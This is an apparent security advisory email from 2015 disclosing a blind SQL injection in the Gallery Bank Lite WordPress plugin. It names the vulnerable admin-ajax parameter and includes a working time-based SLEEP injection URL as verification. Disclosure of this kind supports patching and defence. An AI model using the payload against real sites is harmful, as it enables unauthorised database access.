Subject: Blind SQL injection in Gallery Bank Lite Edition Version 3.0.229
Date: Fri, 21 Aug 2015 10:51:57 +0200

Hello,

Plugin: Gallery Bank Lite Edition Version 3.0.229 https://wordpress.org/plugins/gallery-bank/

1. Blind SQL injection

Authenticated users (like editors) can execute arbitrary sql commands (there is no CSRF protection)

Method: GET
Url: http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=[sqli]
Vulnerable parameters: delete_array

Example PHP callstack:
/gallery-bank/lib/add-new-album-class.php:178
wpdb::query  

Verification:
http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=-1)%20and%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX);%20--%20-

-- 
Regards,
Marcin Probola,